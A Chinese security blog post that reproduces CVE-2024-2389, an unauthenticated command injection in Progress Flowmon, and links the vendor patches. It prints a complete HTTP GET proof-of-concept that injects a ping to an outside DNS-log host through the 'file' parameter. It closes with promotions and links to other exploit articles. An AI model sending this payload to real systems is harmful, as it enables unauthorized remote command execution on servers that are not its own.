CVE-2024-2389命令执行漏洞 (附EXP)

CVE-2024-2389命令执行漏洞 (附EXP)

渗透Xiao白帽 2024-05-10 23:46

网安引领时代,弥天点亮未来   

0x00写在前面

本次测试仅供学习使用,如若非法他用,与平台和本文作者无关,需自行负责!
0x01漏洞介绍Progress Flowmon是Progress公司的一个实时网络流量监控工具。Progress Flowmon 11.1.14之前的11.x版本和12.3.5之前的12.x版本存在安全漏洞,该漏洞源于存在操作系统命令注入漏洞,未经身份验证的用户可以通过管理界面访问系统,从而执行任意系统命令。0x02影响版本Progress Flowmon 11.1.14之前的11.x版本和12.3.5之前的12.x版本0x03漏洞复现

1.访问漏洞环境

2.对漏洞进行复现 POC (GET)漏洞复现GET /service.pdfs/confluence?lang=en&file=ping%20wpzmtaazjp.dgrh3.cn HTTP/1.1Host: 127.0.0.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.3 Safari/605.1.15Connection: closeAccept: /Accept-Language: enAccept-Encoding: gzip             测试dnslog3.nuclei工具测试(漏洞存在)0x04修复建议目前厂商已发布升级补丁以修复漏洞,补丁获取链接:https://support.kemptechnologies.com/hc/en-us/articles/24878235038733-CVE-2024-2389-Flowmon-critical-security-vulnerabilityhttps://support.kemptechnologies.com/hc/en-us/articles/19957432995213-Download-Flowmon-12-3弥天简介学海浩茫,予以风动,必降弥天之润!弥天安全实验室成立于2019年2月19日,主要研究安全防守溯源、威胁狩猎、漏洞复现、工具分享等不同领域。目前主要力量为民间白帽子,也是民间组织。主要以技术共享、交流等不断赋能自己,赋能安全圈,为网络安全发展贡献自己的微薄之力。口号 网安引领时代,弥天点亮未来网 安 考 证需要考以下各类安全证书的可以联系我,价格优惠、组团更便宜!CISP、PTE、PTS、DSG、IRE、IRS、NISP、PMP、CCSK、CISSP、ISO27001…高薪内推 | 2024国HVV来了!大量招人中···内推通道👇 http://gywa.com.cn/XeBvWX报名投递简历时记得备注【渗透Xiao白帽】可优先直推面试~也可阅读原文报名或扫描上方二维码邀请进群交流~24hvv红蓝py交流群,共享资源 一起py 不定期福利赠送群满可以后台加vx备注py 邀请进群往期推荐 · 有彩蛋【内网渗透】内网信息收集命令汇总【内网渗透】域内信息收集命令汇总【超详细 | Python】CS免杀-Shellcode Loader原理(python)【超详细 | Python】CS免杀-分离+混淆免杀思路【超详细 | 钟馗之眼】ZoomEye-python命令行的使用【超详细 | 附EXP】Weblogic CVE-2021-2394 RCE漏洞复现【超详细】CVE-2020-14882 | Weblogic未授权命令执行漏洞复现【超详细 | 附PoC】CVE-2021-2109 | Weblogic Server远程代码执行漏洞复现【漏洞分析 | 附EXP】CVE-2021-21985 VMware vCenter Server 远程代码执行漏洞【CNVD-2021-30167 | 附PoC】用友NC BeanShell远程代码执行漏洞复现【奇淫巧技】如何成为一个合格的“FOFA”工程师【超详细】Microsoft Exchange 远程代码执行漏洞复现【CVE-2020-17144】【超详细】Fastjson1.2.24反序列化漏洞复现  记一次HW实战笔记 | 艰难的提权爬坑走过路过的大佬们留个关注再走呗往期文章有彩蛋哦